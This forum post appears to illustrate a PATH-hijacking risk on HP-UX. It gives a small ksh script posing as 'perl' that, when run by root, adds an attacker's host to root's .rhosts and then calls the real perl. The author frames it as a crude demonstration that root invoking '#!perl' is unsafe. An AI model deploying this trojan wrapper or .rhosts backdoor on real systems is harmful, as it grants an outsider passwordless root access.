Just a quick HP-UX example... name your script perl and place it in any directory located in the PATH *before* the actual perl.
#!/usr/bin/ksh
if [ `/usr/bin/whoami` = root ]; then
/usr/bin/chmod 600 ${HOME}/.rhosts
/usr/bin/echo myhackerpcname >> ${HOME}/.rhosts
fi
/usr/bin/perl $@
A couple of notes:
- This is a VERY crude example, and is to illustrate Masem's general security point
- "myhackerpcname" is the name of the hacker's PC
- A true hacker would use something a LOT less obvious than this script -- it leaves fingerprints all over the place, and could easily trip a security sweep checking the .rhosts files. This script is more likely to be an internal breach by a less skilled attacker.
- If, however, a root account were to execute a perl script with #!perl, the system's security would be compromised -- well, anyone logged into "myhackerpcname" as root could log into the compomised system as root without using a password.
Update:
- Corrected some typos.
- Changed the file permissions a bit -- made them a little more correct. (Suggestions made by blyman)